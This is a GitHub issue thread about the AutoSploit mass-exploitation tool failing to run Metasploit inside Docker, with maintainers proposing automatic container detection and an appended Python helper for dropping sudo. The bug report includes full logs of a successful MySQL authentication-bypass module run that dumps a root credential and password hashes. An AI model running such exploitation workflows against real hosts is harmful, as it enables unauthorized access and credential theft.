NullArray / AutoSploit

Automated Mass Exploiter
GNU General Public License v3.0

AutoSploit not executing msf commands in docker #1210

Closed scmanjarrez closed 4 years ago

scmanjarrez commented 4 years ago

Running information

- What branch did you download? Master
- Clone, or docker run? Docker
- What OS are you running? Kali GNU/Linux rolling in host, Ubuntu 18.04.3 in docker

Exploit module information

Program information

root@008fc2721648:/opt/metasploit-framework/AutoSploit# python autosploit.py -e -C msf_autorun 10.10.20.3 2424 -f exploits.json

                  . '  .
               ' .( '.) '
       _     ('-.)' (`'.) '
      |0|- -(  #autosploit  )
   .--`+'--.  .  (' -,).(') .
   |`-----'|   (' .) - ('. )
   |       |    . (' `.  )
   |  .-.  |       ` .  `
   | (0.0) |
   | >|=|< |
   |  `"`  |
   |       |
   |       |
   `-.___.-'
   v(4.0)

[+] welcome to autosploit, give us a little bit while we configure
[i] checking your running platform
[i] checking for disabled services
[+] attempting to load API keys
[+] Shodan API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/shodan.key
[+] Censys API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/censys.key
[i] Loaded 1 exploits from exploits.json.
[+] Launching exploits against 1 hosts:
[+] launching exploit 'auxiliary/scanner/mysql/mysql_authbypass_hashdump' against host '10.10.0.3'
[+] Executing command 'sudo msfconsole -r /root/.autosploit_home/autosploit_out/2019-11-26_16h25m17s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump -q'

[+] **********RESULTS**********
[+]     1 exploits run against 1 hosts.
[+]     0 exploit successful (Check report.csv to validate!).
[+]     0 exploit failed.
[+]     Exploit run saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h25m17s
[+]     Report saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h25m17s/report.csv

I have run AutoSploit in docker and it isn't working correctly. You can see that exploiter.py is executing the command "sudo msfconsole ...". In the docker machine there is no "sudo", so it fails the execution, then, "msfconsole" is not in PATH so it won't work either. After removal of "sudo"

sed -i 's/sudo //g' lib/exploitation/exploiter.py

and addition of msfconsole to path (or using --msf-path), it works flawlessly

export PATH=$PATH:/opt/metasploit-framework

root@008fc2721648:/opt/metasploit-framework/AutoSploit# python autosploit.py -e -C msf_autorun 10.10.20.3 2424 -f exploits.json

                  . '  .
               ' .( '.) '
       _     ('-.)' (`'.) '
      |0|- -(  #autosploit  )
   .--`+'--.  .  (' -,).(') .
   |`-----'|   (' .) - ('. )
   |       |    . (' `.  )
   |  .-.  |       ` .  `
   | (0.0) |
   | >|=|< |
   |  `"`  |
   |       |
   |       |
   `-.___.-'
   v(4.0)

[+] welcome to autosploit, give us a little bit while we configure
[i] checking your running platform
[i] checking for disabled services
[+] attempting to load API keys
[+] Shodan API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/shodan.key
[+] Censys API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/censys.key
[i] Loaded 1 exploits from exploits.json.
[+] Launching exploits against 1 hosts:
[+] launching exploit 'auxiliary/scanner/mysql/mysql_authbypass_hashdump' against host '10.10.0.3'
[+] Executing command 'msfconsole -r /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump -q'
(msf)>> [*] Processing /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump for ERB directives.
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> workspace -a msf_autorun
(msf)>> [*] Added workspace: msf_autorun
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg lhost 10.10.20.3
(msf)>> lhost => 10.10.20.3
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg lport 2424
(msf)>> lport => 2424
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg verbose true
(msf)>> verbose => true
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg threads 20
(msf)>> threads => 20
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> set rhost 10.10.0.3
(msf)>> [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
(msf)>> rhost => 10.10.0.3
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> set rhosts 10.10.0.3
(msf)>> rhosts => 10.10.0.3
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> run -z
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 The server allows logins, proceeding with bypass test
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 10% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 20% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 30% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 40% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 50% complete
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Successfully bypassed authentication after 588 attempts. URI: mysql://root:lpOAyKt@10.10.0.3:3306
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Hash Table has been saved: /root/.msf4/loot/20191126161722_msf_autorun_10.10.0.3_mysql.hashes_300774.txt
(msf)>> [*] Scanned 1 of 1 hosts (100% complete)
(msf)>> [*] Auxiliary module execution completed
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> exit -y
(msf)>> 

[+] **********RESULTS**********
[+]     1 exploits run against 1 hosts.
[+]     1 exploit successful (Check report.csv to validate!).
[+]     0 exploit failed.
[+]     Exploit run saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s
[+]     Report saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/report.csv

Meanwhile, I'm adding these workarounds to my entrypoint.sh.

Ekultek commented 4 years ago

Are you saying that you have msf inside of a docker container and want to execute the commands in the container, or that the docker image with AS is bad?

Ekultek commented 4 years ago

@NullArray we could just add a --docker flag and if it's passed don't use the sudo keyword when executing the command. We could also check if the user is inside a docker container before executing just in case and if we determine they are we can either disallow them execution or automatically associate the flag as True. What do you think?

scmanjarrez commented 4 years ago

> Are you saying that you have msf inside of a docker container and want to execute the commands in the container, or that the docker image with AS is bad?

Correct, I'm trying to execute AutoSploit from a container without user input, using -e and -f arguments.

Ekultek commented 4 years ago

@scmanjarrez what do you think of the docker flag idea above? Or do you think it would work better to detect if the user is inside a docker container and go from there?

scmanjarrez commented 4 years ago

> @scmanjarrez what do you think of the docker flag idea above? Or do you think it would work better to detect if the user is inside a docker container and go from there?

It's ok for me to use the --docker flag. Right now I'm detecting if autosploit is running inside a docker container, but it would be better to make it general so it'll work regardless of the container tool.

Ekultek commented 4 years ago

> It's ok for me to use the --docker flag. Right now I'm detecting if autosploit is running inside a docker container, but it would be better to make it general so it'll work regardless of the container tool.

Alright, I’ll create a way to determine if we’re inside a docker container, that should make it more portable instead of creating a flag that will have to be passed.

Basically what I’ll do is just check if we’re inside a container, if we are, I’ll get it to run without sudo. It’ll be up to you to pass the path though (if needed)

Ekultek commented 4 years ago

fixed via https://github.com/NullArray/AutoSploit/commit/03020fd08bf6869ee240cf5d7d3499cd03452846 look for it in the next merge
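
The approach discussed in this thread (drop `sudo` when the process is already root, inside a container, or has no `sudo` binary, and resolve the tool path explicitly so a missing binary is an error rather than a silent "0 successful, 0 failed"), as an added example that is not AutoSploit's code or the contents of the linked commit. The function names, the marker files checked and the cgroup hint list are assumptions chosen for illustration.

```python
import os
import shutil

# Marker files: Docker creates /.dockerenv, Podman creates /run/.containerenv.
CONTAINER_MARKERS = ("/.dockerenv", "/run/.containerenv")
# Substrings that commonly appear in /proc/1/cgroup on cgroup v1 hosts (assumed list).
CGROUP_HINTS = ("docker", "kubepods", "containerd", "lxc", "libpod")


def in_container(exists=os.path.exists, cgroup_text=None):
    """Best-effort container check; the parameters exist so it can be tested."""
    if any(exists(p) for p in CONTAINER_MARKERS):
        return True
    if cgroup_text is None:
        try:
            with open("/proc/1/cgroup") as fh:
                cgroup_text = fh.read()
        except OSError:
            return False
    # On cgroup v2 this file is often just "0::/", so a miss proves nothing.
    return any(hint in cgroup_text for hint in CGROUP_HINTS)


def privilege_prefix(euid=None, which=shutil.which, containerized=None):
    """Return ['sudo'] only when escalation is both needed and possible."""
    euid = os.geteuid() if euid is None else euid
    containerized = in_container() if containerized is None else containerized
    if euid == 0 or containerized or which("sudo") is None:
        return []
    return ["sudo"]


def build_command(tool, args, tool_dir=None, **kw):
    """Resolve `tool` and fail loudly instead of launching a broken command."""
    which = kw.get("which", shutil.which)
    search = os.environ.get("PATH", "")
    if tool_dir:  # explicit directory, comparable to passing a path option
        search = tool_dir + os.pathsep + search
    resolved = which(tool, path=search)
    if resolved is None:
        raise FileNotFoundError("%s not found in PATH or %r" % (tool, tool_dir))
    return privilege_prefix(**kw) + [resolved] + list(args)
```

Checking the effective UID and the presence of `sudo` works regardless of the container tool; the marker-file and cgroup checks are heuristics and can miss runtimes that leave neither trace.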